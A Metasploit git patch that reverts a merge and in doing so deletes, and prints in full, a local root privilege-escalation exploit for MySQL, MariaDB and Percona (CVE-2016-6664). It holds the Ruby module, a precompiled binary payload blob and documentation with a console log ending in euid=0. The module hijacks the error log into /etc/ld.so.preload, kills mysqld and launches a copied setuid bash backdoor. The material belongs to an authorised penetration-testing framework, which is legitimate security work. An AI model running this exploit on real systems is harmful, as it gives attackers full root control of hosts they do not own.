From ff2b8dcf99d76b17d7a482ca56162a073c0f1111 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Sun, 22 Jan 2017 19:16:33 -0600
Subject: [PATCH] Revert "Land #7605, Mysql privilege escalation,
 CVE-2016-6664" - premature merge

This reverts commit 92a1c1ece4da3989bc852d94afd1e2c4b083263a, reversing
changes made to 9b16cdf6028bf13119b66ebc21ef3cd19de176b7.
---
 data/exploits/CVE-2016-6664/2016-6664.out     | Bin 8240 -> 0 bytes
 .../exploit/linux/local/mysql_priv_esc.md     | 127 ----------
 .../exploits/linux/local/mysql_priv_esc.rb    | 216 ------------------
 3 files changed, 343 deletions(-)
 delete mode 100755 data/exploits/CVE-2016-6664/2016-6664.out
 delete mode 100644 documentation/modules/exploit/linux/local/mysql_priv_esc.md
 delete mode 100644 modules/exploits/linux/local/mysql_priv_esc.rb

diff --git a/data/exploits/CVE-2016-6664/2016-6664.out b/data/exploits/CVE-2016-6664/2016-6664.out
deleted file mode 100755
index 7f32e8dde0871d3f361aef2d8981ec2240e3ef61..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8240
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
JtwD_y{{hX$`gQ;S

diff --git a/documentation/modules/exploit/linux/local/mysql_priv_esc.md b/documentation/modules/exploit/linux/local/mysql_priv_esc.md
deleted file mode 100644
index 264890db89..0000000000
--- a/documentation/modules/exploit/linux/local/mysql_priv_esc.md
+++ /dev/null
@@ -1,127 +0,0 @@
-
-## Notes
-
-This exploit was tested on ubuntu 14 and 16. As it relies on log file location and service restarting, success on other linux distributions depends greatly.
-
-## Creating A Testing Environment
-
-There are a few requirements for this module to work:
-
-  1. mysql must be started by running mysql_safe
-  2. the error log must be active
-  3. mysql logging through syslog must not enabled
-  4. mysql automatic restart must be enabled
-
-  Using Ubuntu 16.04:
-
-  1. install mariadb - `apt-get -y install mariadb-server`
-  2. disable syslog - `sed -i -e "s/syslog/#syslog/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
-  3. enable error log - `sed -i -e "s/skip_log_error/#skip_log_error/g" /etc/mysql/mariadb.conf.d/50-mysqld_safe.cnf`
-  4. enable service - `systemctl enable mysql.service`
-  5. start service - `systemctl start mysql.service`
-
-This module has been tested against the following versions of mysql running on Ubuntu 16.04:
-
-  1. MariaDB 10.0.27
-
-On Ubuntu 14.04:
-
-  1. MySQL 5.5.35
-  2. MariaDB 5.5.52
-
-On Debian 8.6
-
-  1. MySQL 5.5.53
-
-This module was not tested against, but may work against:
-
-  * MySQL
-     <= 5.5.51
-     <= 5.6.32
-     <= 5.7.14
-
-  * MariaDB
-     <= 5.5.50
-
-  * Percona Server
-     < 5.5.51-38.2
-     < 5.6.32-78-1
-     < 5.7.14-8
-
-  * Percona XtraDB Cluster
-     < 5.6.32-25.17
-     < 5.7.14-26.17
-     < 5.5.41-37.0
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  4. Do: `use exploit/linux/local/mysql_priv_esc`
-  5. Do: `set session #`
-  6. Do: `set verbose true`
-  7. Do: `exploit`
-
-## Options
-
-  **WritableDir**
-
-  A folder we can write files to.  Defaults to /tmp
-
-  **ErrorLog**
-
-  The mysql service error log file. The location of this file is set on the configuration files. Defaults to /var/log/mysql/error.log
-
-  **BackdoorShell**
-
-  The shell that will be launched using elevated privileges.  Defaults to /bin/bash
-
-  **COMPILE**
-
-  If we should live compile on the system, or drop pre-created binaries.  `Auto` will determine if gcc/libs are installed to compile live on the system.  Defaults to `Auto`
-
-## Scenarios
-
-### Ubuntu 16.04 (with Linux 4.4.0-21-generic)
-### MariaDB 10.0.27 (MariaDB-0ubuntu0.16.04.1)
-
-#### Initial Access
-
-    Use whatever means to get a session back to metaploit ith the mysql account, usually dropping a webshell, connecting back to metaploit and escalate to mysql.
-
-#### Escalate to root
-
-msf exploit(mysql_priv_esc) >
-[*] Sending stage (36 bytes) to 192.168.205.64
-[*] Command shell session 45 opened (192.168.205.52:443 -> 192.168.205.64:51400) at 2016-11-16 21:44:16 +0000
-
-msf exploit(mysql_priv_esc) > set session 45
-session => 45
-msf exploit(mysql_priv_esc) > run
-
-[+] mysqld_safe is running
-[+] The current user is mysql
-[*] Checking if gcc are installed
-[*] Checking if gcc are installed
-[*] Dropping pre-compiled exploit on system
-[*] Writing privesclib to /tmp/fYAMgzW5.so
-[*] Max line length is 65537
-[*] Writing 8240 bytes in 1 chunks of 19877 bytes (octal-encoded), using printf
-[*] Seting up the preload trap
-[*] cp /bin/bash /tmp/mysqlrootsh
-[*] touch -f /var/log/mysql/error.log; mv /var/log/mysql/error.log /var/log/mysql/error.log.tmp && ln -s /etc/ld.so.preload /var/log/mysql/error.log
-[*] kill $(pgrep mysqld)
-[*] /bin//sh: 27: kill: Operation not permitted
-
-[*] Waiting for mysqld to restart...
-[*] Executing escalation.
-[*] echo /tmp/fYAMgzW5.so > /etc/ld.so.preload
-[*] chmod 755 /etc/ld.so.preload
-[*] /usr/bin/sudo 2>/dev/null >/dev/null
-[*] /tmp/mysqlrootsh -p -c "rm -f /etc/ld.so.preload; rm -f /tmp/fYAMgzW5.so"
-[*] /tmp/mysqlrootsh -p
-[*] Cleanup done.
-[!] This exploit may require manual cleanup of '/tmp/mysqlrootsh' on the target
-msf exploit(mysql_priv_esc) > sessions -i 45 -c "id"
-[*] Running 'id' on shell session 45 (192.168.205.64)
-uid=112(mysql) gid=121(mysql) euid=0(root) groups=121(mysql)
diff --git a/modules/exploits/linux/local/mysql_priv_esc.rb b/modules/exploits/linux/local/mysql_priv_esc.rb
deleted file mode 100644
index b8f6440d93..0000000000
--- a/modules/exploits/linux/local/mysql_priv_esc.rb
+++ /dev/null
@@ -1,216 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require "msf/core"
-
-class MetasploitModule < Msf::Exploit::Local
-  Rank = GoodRanking
-
-  include Msf::Post::Common
-  include Msf::Post::File
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
-
-  def initialize(info = {})
-    super(update_info(info,
-        'Name'           => 'MySQL / MariaDB / Percona   -   Root Privilege Escalation',
-        'Description'    => %q{
-          MySQL-based databases including MySQL, MariaDB and Percona are affected
-          by a privilege escalation vulnerability which can let attackers who have
-          gained access to mysql system user to further escalate their privileges
-          to root user allowing them to fully compromise the system.
-        },
-        'License'        => MSF_LICENSE,
-        'Author'         =>
-          [
-            'x2020 <x2020@gmail.com>',  # Module
-            'Dawid Golunski'            # Discovery
-          ],
-        'DisclosureDate' => 'Nov 01 2016',
-        'Platform'       => [ 'linux'],
-        'SessionTypes'   => ['shell', 'meterpreter'],
-        'Targets'        => [ ['Automatic', {}] ],
-        'DefaultTarget'  => 0,
-        'DefaultOptions' =>
-        {
-          'DisablePayloadHandler' => true
-        },
-        'References'     =>
-          [
-            [ 'EDB', '40679'],
-            [ 'CVE', '2016-6664'],
-            [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html']
-          ]
-      ))
-    register_options(
-      [
-        OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]),
-        OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
-        OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]),
-        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
-      ], self.class)
-  end
-
-  def check
-
-    def check_reqs?()
-      # should have mysqld_safe running
-      check_command = "if pgrep mysqld; "
-      check_command << "then echo OK; "
-      check_command << "fi"
-      output = cmd_exec(check_command).gsub("\r", '')
-      vprint_status output
-      if output['OK'] == 'OK'
-        vprint_good "mysqld_safe is running"
-        return true
-      end
-      print_error "mysqld process not running"
-      false
-    end
-
-    def mysql_user?()
-      # test for mysql user
-      mysql = cmd_exec("id | grep -E '(mysql)'")
-      if not mysql.include?("mysql")
-        print_error "The current session user (#{mysql}) is not mysql"
-        return false
-      end
-      vprint_good "The current user is mysql"
-      true
-    end
-
-    def preload_exists?()
-      if exists?("/etc/ld.so.preload")
-        print_error "Found ld.so.preload. Exiting for safety."
-        return true
-      end
-      false
-    end
-
-    def sudo_exists?()
-      @sudo = cmd_exec('which sudo')
-      if @sudo.include?("sudo")
-        return true
-      end
-      false
-    end
-
-    if check_reqs? and mysql_user? and sudo_exists?
-      if preload_exists?
-        return CheckCode::Detected
-      end
-      return CheckCode::Appears
-    end
-
-    CheckCode::Safe
-  end
-
-  def exploit
-
-    if check != CheckCode::Appears
-      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
-    end
-
-    # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
-    def has_prereqs?()
-      vprint_status('Checking if gcc is installed')
-      if target.name == "Ubuntu"
-        gcc = cmd_exec('which gcc')
-        if gcc.include?('gcc')
-          vprint_good('gcc is installed')
-        else
-          print_error('gcc is not installed.  Compiling will fail.')
-        end
-        return gcc.include?('gcc')
-      else
-        return false
-      end
-    end
-
-    compile = has_prereqs?
-    if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
-      if has_prereqs?()
-        compile = true
-        vprint_status('Live compiling exploit on system')
-      else
-        vprint_status('Dropping pre-compiled exploit on system')
-      end
-    end
-
-    # build file names and locations
-    privesclib_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".so"
-    privescsrc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".c"
-    pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
-    payload_path = datastore["WritableDir"] + "/" + rand_text_alpha(8)
-    backdoorsh = datastore["BackdoorShell"]
-    backdoorpath = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
-    error_log_file = datastore["ErrorLog"]
-
-    # setup the files
-    rm_f pwn_file
-    if compile
-      vprint_status "Writing pwn source to #{privescsrc_file}"
-      rm_f privescsrc_file
-      write_file(privescsrc_file, privesclib_file)
-      cmd_exec("gcc -Wall -fPIC -shared -o #{privesclib_file} #{privescsrc_file} -ldl")
-      register_file_for_cleanup(privescsrc_file)
-    else
-      # privesclib.so file
-      path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-6664', '2016-6664.out')
-      fd = ::File.open( path, "rb")
-      privesclib = fd.read(fd.stat.size)
-      fd.close
-      vprint_status "Writing privesclib to #{privesclib_file}"
-      backdoorpath = "/tmp/mysqlrootsh" # hardcoded into privesclib.so
-      write_file(privesclib_file, privesclib)
-    end
-    register_file_for_cleanup(backdoorpath)
-    register_file_for_cleanup(privesclib_file)
-
-    # the actual pwning
-    def do_pwn(privesclib_file, suidbin, backdoorpath, payload_path)
-      print_status "Executing escalation."
-      do_cmd_exec("echo #{privesclib_file} > /etc/ld.so.preload")
-      do_cmd_exec("chmod 755 /etc/ld.so.preload")
-      do_cmd_exec("#{suidbin} 2>/dev/null >/dev/null")
-      do_cmd_exec("#{backdoorpath} -p -c \"rm -f /etc/ld.so.preload; rm -f #{privesclib_file}\"")
-      do_cmd_exec("#{backdoorpath} -p")
-    end
-
-    # reset system state
-    def do_cleanup(error_log_file)
-      cmd_exec("rm -f #{error_log_file}")
-      cmd_exec("mv -f #{error_log_file}.tmp #{error_log_file}")
-      cmd_exec("if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload; fi")
-      vprint_status "Cleanup done."
-    end
-
-    # util cmd_exec with verbose print
-    def do_cmd_exec(cmd)
-      vprint_status cmd
-      r = cmd_exec(cmd)
-      if r != ""
-        print_status r
-      end
-    end
-
-    # initial setup for pwning
-    vprint_status "Seting up the preload trap"
-    do_cmd_exec("cp #{backdoorsh} #{backdoorpath}")
-    do_cmd_exec("touch -f #{error_log_file}; mv #{error_log_file} #{error_log_file}.tmp && ln -s /etc/ld.so.preload #{error_log_file}")
-    do_cmd_exec("kill $(pgrep mysqld)")
-
-    # wait for restart
-    print_status "Waiting for mysqld to restart..."
-    cmd_exec("while :; do { sleep 0.1; if [ -f /etc/ld.so.preload ]; then { echo #{privesclib_file} > /etc/ld.so.preload; rm -f #{error_log_file}; break; } fi } done", nil, 125)
-
-    # pwn the system
-    do_pwn(privesclib_file, @sudo, backdoorpath, payload_path)
-
-    # cleanup the mess
-    do_cleanup(error_log_file)
-
-  end
-end